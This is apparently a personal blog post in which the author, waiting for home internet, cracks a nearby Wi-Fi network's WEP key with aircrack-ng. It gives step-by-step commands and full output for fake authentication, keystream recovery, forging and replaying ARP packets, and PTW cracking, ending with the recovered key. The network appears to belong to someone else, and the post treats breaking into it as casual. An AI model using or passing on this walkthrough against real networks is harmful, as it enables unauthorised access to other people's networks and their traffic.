Cracking WEP with aircrack-ng

So i'll have to apologize for a severe lack of posts, i just moved from Texas to Northern VA and its been hell finding a place to rent. We finally found a place but the cable man doesnt come till monday, now that wont do i need my net fix. thankfully there are plenty of wifi networks i can see from inside the house...

# Step 1: Target a specific network #

root@segfault:/home/cg/eric-g# airodump-ng --bssid 00:18:F8:F4:CF:E4 -c 9 ath2 -w eric-g
CH 9 ][ Elapsed: 4 mins ][ 2007-11-21 23:08


00:18:F8:F4:CF:E4 21 21 2428 26251 0 9 48 WEP WEP OPN eric-G

BSSID STATION PWR Lost Packets Probes

00:18:F8:F4:CF:E4 06:19:7E:8E:72:87 23 0 34189

# Step 2: Associate with the target network #

root@segfault:/home/cg/eric-g# aireplay-ng -1 600 -e eric-G -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:53:23 Waiting for beacon frame (BSSID: 00:18:F8:F4:CF:E4)
22:53:23 Sending Authentication Request
22:53:23 Authentication successful
22:53:23 Sending Association Request
22:53:24 Association successful :-)
22:53:39 Sending keep-alive packet
22:53:54 Sending keep-alive packet
22:54:09 Sending keep-alive packet
22:54:24 Sending keep-alive packet
22:54:39 Sending keep-alive packet
22:54:54 Sending keep-alive packet
22:55:09 Sending keep-alive packet
22:55:24 Sending keep-alive packet
22:55:39 Sending keep-alive packet
22:55:54 Sending keep-alive packet
22:55:54 Got a deauthentication packet!
22:55:57 Sending Authentication Request
22:55:59 Sending Authentication Request
22:55:59 Authentication successful
22:55:59 Sending Association Request
22:55:59 Association successful :-)
22:56:14 Sending keep-alive packet


# Step 3: Generate Key Stream #

root@segfault:/home/cg/eric-g# aireplay-ng -5 -b 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:59:41 Waiting for a data packet...
Read 873 packets...

Size: 352, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:18:F8:F4:CF:E2

0x0000: 0842 0000 0100 5e7f fffa 0018 f8f4 cfe4 .B....^........
0x0010: 0018 f8f4 cfe2 c0b5 121a 4600 0e18 0f3d ..........F....=
0x0020: bd80 8c41 de34 0437 8d2d c97f 2447 3d81 ...A.4.7.-.$G=.
0x0030: 9bdc 68da 06b2 18be 9cd6 9cb4 9443 8725 ..h..........C.%
0x0040: 87f6 9a14 1ff9 0cfa bd36 862e ec54 7215 .........6...Tr.
0x0050: 335b 4a91 d6a4 caae 5a58 a736 6230 87d9 3[J.....ZX.6b0..
0x0060: 4e14 7617 21c6 eda4 9b0d 3a00 0b4f 47ab N.v.!.....:..OG.
0x0070: a529 dedf 4c13 880c a1e6 37f7 50e6 599c .)..L.....7.P.Y.
0x0080: 0a4c 0b7f 24ae b019 ef2f 36b9 c499 8643 .L.$..../6....C
0x0090: 6592 5835 23e5 c8e9 d1b9 3d36 1fe5 ecfe e.X5#.....=6....
0x00a0: 510b 51ba 4fe4 e2ed d33b 0459 ca68 82b8 Q.Q.O....;.Y.h..
0x00b0: c856 ea70 829f c753 1614 290e d051 392f .V.p...S..)..Q9/
0x00c0: fa65 cbc6 c5f8 24b1 cdbd 94e5 08c3 2dd4 .e....$.......-.
0x00d0: 6e4b 983b dc82 b2cd b3f1 dab5 b816 6188 nK.;..........a.
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-1121-230028.cap
23:00:38 Data packet found!
23:00:38 Sending fragmented packet
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 384 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 1500 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
Saving keystream in fragment-1121-230038.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

# Step 4: Build a valid ARP Packet #

root@segfault:/home/cg/eric-g# packetforge-ng -0 -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 -k -l -w arp -y *.xor
Wrote packet to: arp

# Step 5: Generate your own arp traffic #

root@segfault:/home/cg/eric-g# aireplay-ng -2 -r arp -x 150 ath2

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Source MAC = 06:19:7E:8E:72:87

0x0000: 0841 0201 0018 f8f4 cfe4 0619 7e8e 7287 .A..........~.r.
0x0010: ffff ffff ffff 8001 1f1a 4600 c9d3 e5e7 ..........F.....
0x0020: d65a 6a63 0b51 bb60 8390 a8b4 947d 456f .Zjc.Q.`.....}Eo
0x0030: 3a05 25b2 7464 7db7 c49b d38a f789 822c}........,
0x0040: 83a8 93c5 ....

Use this packet ? y

Saving chosen packet in replay_src-1121-230224.cap
You should also start airodump-ng to capture replies. **we started airodump on step1

at this point your airodump capture should really be filling up with a ton of data packets as we do the arp replay attack

# Step 6: Start cracking #

we can run aircrack while the arp replay attack is ongoing, so you dont have to stop the arp replay or fake authentication sessions.

cg@segfault:~/eric-g$ aircrack-ng -z eric-g-05.cap
Opening eric-g-05.cap
Read 64282 packets.

# BSSID ESSID Encryption

1 00:18:F8:F4:CF:E4 eric-G WEP (21102 IVs)

Choosing first network as target.

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21397 ivs.

Aircrack-ng 0.9.1

[00:00:11] Tested 78120/140000 keys (got 22918 IVs)

KB depth byte(vote)
0 3/ 5 34( 111) 70( 109) 42( 107) 2C( 106) B9( 106) E3( 106)
1 1/ 14 34( 115) 92( 110) 35( 109) 53( 109) 33( 108) CD( 107)
2 6/ 18 91( 114) E7( 114) 21( 111) 0E( 110) 88( 109) C6( 109)
3 2/ 31 37( 109) 80( 109) 5F( 108) 92( 108) 9E( 108) 9B( 107)
4 0/ 2 29( 129) 55( 114) AD( 112) 6A( 111) BB( 110) C1( 110)

KEY FOUND! [ 70:34:91:37:29 ]
Decrypted correctly: 100%